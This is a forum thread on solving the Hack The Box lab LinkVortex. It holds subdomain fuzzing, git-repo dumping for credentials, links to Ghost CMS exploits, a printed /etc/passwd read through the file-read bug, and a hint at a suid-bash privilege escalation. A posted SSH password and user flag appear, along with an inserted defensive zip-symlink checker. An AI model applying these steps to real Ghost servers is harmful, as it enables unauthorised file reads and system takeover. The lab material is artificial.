Posts: 5
Threads: 1
Joined: Apr 2024
Starting thread for the box.
Quick OSINT regarding the machine name. Found Vortex Portal (as the box is easy it will definitely be some well-known CVE). However, they are a bit old by HTB standards and the vulns are from '05 and were patched in '17. The only other recurrence I found is that there may be a vulnerable 7z version embedded into the platform usage.
Note: Those are just speculations ahead of the machine start. I'm eager to chat.
GL!
Links:
https://www.incibe.es/en/incibe-cert/ear...-2005-0879
https://cve.mitre.org/cgi-bin/cvename.cg...=2007-5842
https://www.exploit-db.com/exploits/25261
https://nvd.nist.gov/vuln/detail/CVE-2007-3046
Posts: 5
Threads: 1
Joined: Apr 2024
Dec 07, 2024, 07:04 PM
(This post was last modified: Dec 07, 2024, 07:22 PM by cashiwoo.)
ffuf -c -H "Host: FUZZ.linkvortex.htb" -u "http://linkvortex.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 230
dev [Status: 200, Size: 2538, Words: 670, Lines: 116, Duration: 29ms]
http://dev.linkvortex.htb/.git/config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://github.com/TryGhost/Ghost.git
fetch = +refs/tags/v5.58.0:refs/tags/v5.58.0
Vulnerable to CVE-2024-23724 or CVE-2023-40028
Posts: 69
Threads: 0
Joined: Aug 2024
Dec 07, 2024, 07:23 PM
(This post was last modified: Dec 07, 2024, 07:24 PM by hackemall.)
http://linkvortex.htb [200 OK] Apache, Country[RESERVED][ZZ], HTML5, HTTPServer[Apache], IP[10.10.11.47], JQuery[3.5.1], MetaGenerator[Ghost 5.58], Open-Graph-Protocol[website], PoweredBy[Ghost,a], Script[application/ld+json], Title[BitByBit Hardware], X-Powered-By[Express], X-UA-Compatible[IE=edge]
website is running Ghost CMS version 5.58
Posts: 57
Threads: 1
Joined: Apr 2024
Dump git repo on dev subdomain with git-dumper.
Admin credentials for ghost are in authentication.test.js
This works with some adaptations
https://github.com/RhinoSecurityLabs/CVE...2024-23724
But no idea yet what's the point / how to get RCE from that
Posts: 75
Threads: 5
Joined: Sep 2024
https://github.com/0xyassine/CVE-2023-40028 - Look into this - edit the URL and work from there - if you have not found login yet:
YOU WILL LOG IN LIKE THIS:
file> /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash
Posts: 57
Threads: 1
Joined: Apr 2024
(Dec 07, 2024, 08:21 PM)StingEm Wrote: https://github.com/0xyassine/CVE-2023-40028 - Look into this - edit the URL and work from there - if you have not found login yet:
Check the git repo again for the full path to the config file.
Use it to login with ssh and get the user flag.
Posts: 22
Threads: 3
Joined: Oct 2024
(Dec 07, 2024, 08:23 PM)ritualist Wrote: (Dec 07, 2024, 08:21 PM)StingEm Wrote: https://github.com/0xyassine/CVE-2023-40028 - Look into this - edit the URL and work from there - if you have not found login yet:
Check the git repo again for the full path to the config file.
Use it to login with ssh and get the user flag.
from where did you get the login cred?
Posts: 25
Threads: 0
Joined: Nov 2024
0000000000000000000000000000000000000000 299cdb4387763f850887275a716153e84793077d root <dev@linkvortex.htb> 1730322603 +0000 clone: from https://github.com/TryGhost/Ghost.git
Posts: 57
Threads: 1
Joined: Apr 2024
Dec 07, 2024, 08:39 PM
(This post was last modified: Dec 07, 2024, 08:45 PM by ritualist.)
Dockerfile.ghost has the path to the config file
Use https://github.com/0xyassine/CVE-2023-40028 to read it
For root you can either use chained symlinks to get the root flag / ssh key or just put your code for e.g. a suid bash in the CHECK_CONTENT variable.
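Added defensive example, not code from this thread or from the Ghost project: the importer-side check that closes the symlink-in-archive file read the posts above lean on (CVE-2023-40028), rejecting archive members that are symlinks or that resolve outside the extraction root. The sample archive, the `/placeholder/config.json` link target and the `/tmp/import` root are constructed for the demonstration.

```python
import io
import os
import stat
import zipfile


def is_symlink(info: zipfile.ZipInfo) -> bool:
    """Unix mode bits of a zip member live in the high 16 bits of external_attr."""
    return stat.S_ISLNK(info.external_attr >> 16)


def unsafe_members(data: bytes, root: str = "/tmp/import") -> list[tuple[str, str]]:
    """Return (member name, reason) for every entry a content importer must reject.

    Symlink members are flagged because, once extracted as links, a later read of
    the "imported" file follows the link to any path the service account can read.
    Names that resolve outside the extraction root are flagged as traversal.
    """
    findings = []
    root = os.path.realpath(root)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if is_symlink(info):
                findings.append((info.filename, "symlink member"))
                continue
            dest = os.path.realpath(os.path.join(root, info.filename))
            if os.path.commonpath([root, dest]) != root:
                findings.append((info.filename, "path escapes extraction root"))
    return findings


def build_sample_zip() -> bytes:
    """Constructed archive: one normal file, one symlink member, one traversal name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("content/post.md", "# hello\n")
        link = zipfile.ZipInfo("content/settings.json")
        link.external_attr = (stat.S_IFLNK | 0o777) << 16  # mark the member as a symlink
        zf.writestr(link, "/placeholder/config.json")      # a symlink's body is its target
        zf.writestr("../outside.txt", "")
    return buf.getvalue()
```

A safe importer refuses the whole upload when `unsafe_members` returns anything, rather than skipping the bad entries and extracting the rest.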
Posts: 62
Threads: 18
Joined: Aug 2024
(Dec 07, 2024, 08:23 PM)ritualist Wrote: (Dec 07, 2024, 08:21 PM)StingEm Wrote: https://github.com/0xyassine/CVE-2023-40028 - Look into this - edit the URL and work from there - if you have not found login yet:
Check the git repo again for the full path to the config file.
Use it to login with ssh and get the user flag.
Thank you...
└─$ ssh bob@linkvortex.htb
bob@linkvortex.htb's password: fibber-talented-worth
bob@linkvortex:~$ ls
user.txt
bob@linkvortex:~$ cat user.txt
6e6acfb2b564ecec3c71c2963bb3cf85
bob@linkvortex:~$